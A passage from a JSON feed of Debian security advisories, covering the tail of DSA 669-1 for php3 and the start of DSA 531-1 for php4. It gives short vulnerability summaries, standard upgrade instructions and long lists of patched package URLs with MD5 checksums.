http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 9084 48bb1d2671be9eba5b82dbf4b20f78ad\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 6484 e256ccd9284ae021badd122074b74b1d\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 3780 b6ebddbda4b82ac9b2ece422713299b3\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 12556 974d98e304b7f1245aa8a1ae63bac5ff\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 5246 d9cfed19e2b39a9ea16b62bdf6c9bfc0\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 10546 8e5984a3f9867690df76a718eae2903f\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 363618 91be56bffc4fd8d6d807135ef5609ea4\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 509668 9a4fb8ea53ac7dde071cf4d1457a5b9d\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 21332 d8c264de614f57d7ae9184ff3d802101\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 22680 6b35b1879c6dd1b6304d109bc27a1ba7\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 9842 c0197910ef31c5bcb1513b18cc2eeaa6\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 7418 cc7311e6eaadf6ef9a327a4184cc5c65\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 4100 a87de9fbdd2d8a40580243a79a112bf7\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 12254 0105967655177cca0b95cdc90d1f594a\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 5588 a5f7cbee2c5dea79873a0958f26a480a\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 11050 7553dd819910bbeb901cb1e770263f23\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 51110 4009b6e4a31cf1cee28cae63f5948709\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 21748 1ac3abf0bbf304e9af52c30be3b94633\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 22472 27cf8e057093945b35c4775f23b7baaa\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 9688 9d9a15ea3e6df1e8be1be9447c1d7e65\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 7294 86ae4c97b6c0f7b0a25d63bac31c2680\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 3908 96c5a39af1d6691564309ecca06b1e87\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 12618 9d0acec4be6bb1e31b7ce7e48402a208\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 5392 d47d9cacd3951fbca1887f793f862cd8\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 10898 318baf04ee6ad995648bebfee5fbf562\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 362494 87d0da94045062c93b98b748ca3fbe67\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 508018 a881e4973666aaa8c16d7472b2e936d3\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 21140 fbed3f69a6b6fd780280fe41da00100b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 22590 3b0e26f2c94eefd522ab69114a551f0e\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 9802 6ed6a25a43cfb40d21335786ddc2d3c6\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 7438 0a2e239eed8f6b0ec86489f02a685a96\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 4072 0cdf5490573dc2f66a5f9a8949af660b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 12246 e00809f94735652781c574e67d5ffce0\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 5576 6fa8cbb3d3ad6ccd06af6a69573c6248\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 11008 ae77b5a26d971de670955ec44e75478e\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 51104 9136e3ceba753266d19ce3c17dd4bd36\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 21590 42f2254e07370b514d8124153bbbd683\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 22220 f50119bf451470d06236e4cd99054758\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 9638 9e974172f4c4b53090fbe6d63dc7ed03\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 7296 2995ff06de90ecd02b6dd2656ceee1d6\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 3878 153220cd95ffe11e0c1da781673f1915\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 12542 828c4405cdbc27cb9ee3d5a009718a0a\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 5354 7b036ccf01bf64c57c25b924fbf821b5\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 10842 b0f1c42629762a13143b8112c89317ad\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 376796 32e107a47b36e0362d3b4bc1bd9b433b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 496314 60818d9380ac0e4152240ccefa49a770\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 21602 f31f7718eec9d398ab0816a6fe2695f5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 25384 14f08528a71af3c04ff7decb3a370889\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 9300 4898695752eb405b3c20aa8abfce6981\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 7580 988def0f028f74b8a041521e5efa930c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 3876 b5535da0c7c87f4795bdb4a740fc24bb\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 13396 d10482012b23c824b2ba85a3b871efd5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 5350 852177e64782688e6b5b122d70da9ef4\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 11040 be11c6325382ea911dab7dc713244677\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 51082 629d97075642da961550df6f190bf371\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 23068 673faa104a3294b9394d2fb7eed77306\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 25842 de97aa08eb88ce57adf1aaf3b80d6a0f\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 9494 8588c20fc3368cef0c502a7de728b862\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 7516 863f45596b7257d518a9edbfa21e5d95\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 3792 231d028d27d2329594f9fec98b94d484\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 13330 78be778ec106a9168d982fe20808d0a7\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 5260 edb3f6c07bb863f09d4de13a757ae830\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 10820 61a75b5686076a7d9f498dd7bde8f675\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 372384 c9a9a47e963a4654dde350847f6b86c5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 473980 fe4f805056f4a83fbbb1bbb81f9e926b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 21980 e9acbc9d0aa9409f68b20aa824c96d01\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 24894 8962cff4aed1ef3fce89fb44623f18bb\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 10294 b93ddd1aa8d3edca85d7479575712b37\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 7320 139f2565015ef8799f7c7bef1f994918\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 4072 6f0cacf883393f337995112d786ea6ff\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 13538 d2bd76b462a9f73d15df92913ea2d9c2\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 5742 b259cd01e8f6933aa6659c54e0cc482d\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 11566 eb69ad3c18c5455b189e94f67a5edd2c\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 51082 5c6225ff3b84a3d3b0e30eeb476fa68b\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 21584 f26c5bbfee8a6aeac9c82d6ebc69ea34\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 24610 7e33ce9f0e1041983f7603b11d18adf8\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 9928 d5b69114619977fb0446b23c02c38696\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 7116 1f4e74efc9c7b6d26aa96bedf2a316eb\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 3964 83fe0af6b15f54c3538b95ad7268a142\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 13608 8334ebcf496147fec66d34d47817ea0a\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 5790 c3a938f224c8ff6086b165d81d8da185\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 11118 fc354357ced4c8c92988e4c8b2e9fc2c\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 374996 0e7a1ea7a18d6a468fe5bd53ac671076\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 489428 b17ace764d4d2b2bdbf88f9dd3be78db\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 21002 2d888a700a4df277c70b448e9ac292a7\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 24902 ebf943cd3803f6a8df4ffe7f75a94f9c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 9240 600c33ca486f68cb9703750de038ed8d\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 7462 219a976e5d95e2c9080777b4ec43f9b5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 3834 4d031d66839d7c1a7cd48d921efab4db\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 12968 44229516d90dc1f3d458f78735ccdf28\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 5460 8cd025e10d5b3a0a236a492b525f2f45\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 10838 d6ede42e9897c2652c46dcd962c99d06\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 51086 e13efd1e03547ded62932da4b0b8ebc6\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 20894 bad68da4e5c7d0df10af106a0bdf10a3\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 24746 fcd23934066df9812b8a5f0b6dae597c\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 8856 92892b8379d6398883eafc01d697e805\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 7176 37acae7f2c13d854e6962c74ada4e4ca\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 3724 ad00db227131b3c1093d3e882cd148d2\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 12608 c4d5278e1b52bd9d340e5063be96193e\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 5862 bee1da1ffff4ddd8c66124e150bbbe09\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 10324 207ef48ae3e2af44bb1162aacffa9b87\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-02-07T00:00:00", "published": "2005-02-07T00:00:00", "id": "DEBIAN:DSA-669-1:AFB85", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00046.html", "title": "[SECURITY] [DSA 669-1] New php3 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:13", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 531-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJuly 20th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php4\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE Ids : CAN-2004-0594 CAN-2004-0595\n\nTwo vulnerabilities were discovered in php4:\n\n - CAN-2004-0594 - The memory_limit functionality in PHP 4.x up to\n 4.3.7, and 5.x up to 5.0.0RC3, under certain conditions such as\n when register_globals is enabled, allows remote attackers to\n execute arbitrary code by triggering a memory_limit abort during\n execution of the zend_hash_init function and overwriting a\n HashTable destructor pointer before the initialization of key data\n structures is complete.\n\n - CAN-2004-0595 - The strip_tags function in PHP 4.x up to 4.3.7, and\n 5.x up to 5.0.0RC3, does not filter null (\\0) characters within tag\n names when restricting input to allowed tags, which allows\n dangerous tags to be processed by web browsers such as Internet\n Explorer and Safari, which ignore null characters and facilitate\n the exploitation of cross-site scripting (XSS) vulnerabilities.\n\nFor the current stable distribution (woody), these problems have been\nfixed in version 4.1.2-7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4:4.3.8-1.\n\nWe recommend that you update your php4 package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7.dsc\n Size/MD5 checksum: 1505 6380383c81a4ccdd69af5a05bf6a486e\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7.diff.gz\n Size/MD5 checksum: 102793 9ed990da27fcc7b6ed562d2211bd1b5d\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2.orig.tar.gz\n Size/MD5 checksum: 3346579 37e67552bec20e6f02d52e14a11aa269\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.1.2-7_all.deb\n Size/MD5 checksum: 209500 0c2b4d347530f52e815395ce389b1baa\n http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.1.2-7_all.deb\n Size/MD5 checksum: 226778 b94edf230c777552cbd803013b920863\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_alpha.deb\n Size/MD5 checksum: 713402 71d0038ad166db3a5b50b454fbab7b1d\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_alpha.deb\n Size/MD5 checksum: 694732 018508190aed5672ee1767437263f091\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_alpha.deb\n Size/MD5 checksum: 1294804 635604c22cc219312000a1f81d7d3886\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_alpha.deb\n Size/MD5 checksum: 15092 6889093c53c7d8f2c0d43ff1619fbd3b\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_alpha.deb\n Size/MD5 checksum: 21258 87fba06dcdd384e1d7d9c256a844fcab\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_alpha.deb\n Size/MD5 checksum: 29286 cb30f7fb9d2592a35fc7e22b0065ab49\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_alpha.deb\n Size/MD5 checksum: 33322 2f308cdc49dd1477ff9d71cc2768ee04\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_alpha.deb\n Size/MD5 checksum: 18388 1a1e8be936393a5889d3d4d4fa53012d\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_alpha.deb\n Size/MD5 checksum: 15434 e23195fc79a5a605a8c2ba3bec58f531\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_alpha.deb\n Size/MD5 checksum: 6116 8e29970dd544cc68f44d93f41bd39251\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_alpha.deb\n Size/MD5 checksum: 19228 b3e0b768bf9324edb8081f32d466ac34\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_alpha.deb\n Size/MD5 checksum: 25548 4fd908f51ccd355c6da92eea3ed8e131\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_alpha.deb\n Size/MD5 checksum: 5438 628a68a48c83cbc64e7cc2cf5d15b903\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_alpha.deb\n Size/MD5 checksum: 7372 297997e90315de125c662b814167fa3c\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_alpha.deb\n Size/MD5 checksum: 16300 9da3264a552e8d0bf0ec4120b28751ef\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_alpha.deb\n Size/MD5 checksum: 29372 e187575289b5a81c98eda1b071386666\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_arm.deb\n Size/MD5 checksum: 652922 6e19efcfaf455925110518150428c074\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_arm.deb\n Size/MD5 checksum: 626964 84ffca734dee8146aeafda75243ef45c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_arm.deb\n Size/MD5 checksum: 1076736 3c22c165a84c72b532af795a5e092f96\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_arm.deb\n Size/MD5 checksum: 14018 06190c4aa7dc6a7ad2c9b3b6d4aeb737\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_arm.deb\n Size/MD5 checksum: 19906 0e0f892c7156823f359030d6d8b5ee5a\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_arm.deb\n Size/MD5 checksum: 26966 0eff7a991d0692caa56efdd4a163b22e\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_arm.deb\n Size/MD5 checksum: 32856 cd4fbe6d518a93282534fc7fedd383d7\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_arm.deb\n Size/MD5 checksum: 16510 150fc69ba324de8d5527786c9fb06e77\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_arm.deb\n Size/MD5 checksum: 15338 fcd78273933e117abecfc3cbb30df25b\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_arm.deb\n Size/MD5 checksum: 5578 4cd9d8c4c59b785fcf87d6aedd2883b7\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_arm.deb\n Size/MD5 checksum: 15872 3c2cd1abf85928e29f8a405d95dbecb6\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_arm.deb\n Size/MD5 checksum: 24606 602bb7b1d770786769f5fa46593295ab\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_arm.deb\n Size/MD5 checksum: 5128 e21dc2097fa01a121f8964818be3c5ec\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_arm.deb\n Size/MD5 checksum: 6988 9dc2e96fe2766ba6e145e74c4ca73df2\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_arm.deb\n Size/MD5 checksum: 14380 463efbe2466321e1cab8e76f9e5e9828\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_arm.deb\n Size/MD5 checksum: 11712 794de83104082f23fdc8e6bf09439098\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_i386.deb\n Size/MD5 checksum: 597184 65689a0beef8a92de22cf6b6d2f3f50e\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_i386.deb\n Size/MD5 checksum: 582310 fcaf92f17db9813ab02fd7fbafef9dff\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_i386.deb\n Size/MD5 checksum: 989954 ee6ad36c9804ba9bec094523a4eada94\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.1.2-7_i386.deb\n Size/MD5 checksum: 12370 017beaf47f5b97cefe3c1001374abc02\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.1.2-7_i386.deb\n Size/MD5 checksum: 17630 53281abf83b9d031f3d3eef7691d15bf\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.1.2-7_i386.deb\n Size/MD5 checksum: 24490 fb6641d8d41f484944f2d18db50d5abc\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.1.2-7_i386.deb\n Size/MD5 checksum: 376838 0faa6391096915c65f1f724b651241f5\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.1.2-7_i386.deb\n Size/MD5 checksum: 14768 9674abead78e9e95367f058926b93c4b\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.1.2-7_i386.deb\n Size/MD5 checksum: 13848 78429595de89ce092cd0c5ef8d7c8529\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.1.2-7_i386.deb\n Size/MD5 checksum: 5610 bbaa2a509cce24b0770453ffb23e4267\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.1.2-7_i386.deb\n Size/MD5 checksum: 15048 626f4ee86acea04e1223a0953c32ec45\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.1.2-7_i386.deb\n Size/MD5 checksum: 20768 3b27e252f02b198f59418597fe6f7695\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.1.2-7_i386.deb\n Size/MD5 checksum: 4938 f10bae957b469a11298c7e3af9b7846a\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.1.2-7_i386.deb\n Size/MD5 checksum: 6652 063e9e4a19c70f2485e3db38bdff22fd\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.1.2-7_i386.deb\n Size/MD5 checksum: 13346 eb9f5472b97842c1e770c6e169d9fee3\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.1.2-7_i386.deb\n Size/MD5 checksum: 24606 547c14d54dce4679998c6930e988de0d\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/caudium-php4_4.1.2-7_ia64.deb\n Size/MD5 checksum: 920332 22ce4d2ee2cb3298cb087f1af8323f56\n http://security.debian.org/pool/updates/main/p/php4/php4_4.1.2-7_ia64.deb\n Size/MD5 checksum: 890010 25f5e198581bf4b2c6a9b99d1ec12c5d\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.1.2-7_ia64.deb\n Size/MD5 checksum: 1601806 a7943b70b0373f304f54ae361d425115\n 